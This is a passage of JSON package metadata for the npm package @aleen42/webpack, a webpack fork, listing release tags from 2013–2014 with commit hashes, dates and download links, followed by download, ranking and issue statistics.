https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-22T16:59:43.779Z","dependent_packages_count":2,"downloads":9,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":41.71134362760962,"dependent_repos_count":25.32799796580169,"dependent_packages_count":16.223928578504864,"stargazers_count":0.08516183842345436,"forks_count":0.5289106914192746,"average":16.77546854035178},"purl":"pkg:npm/%40aleen42/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@aleen42/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@aleen42/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@aleen42/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T17:00:12.153Z","issues_count":10162,"pull_requests_count":9386,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2758812.4810541794,"issues_closed_count":9895,"pull_requests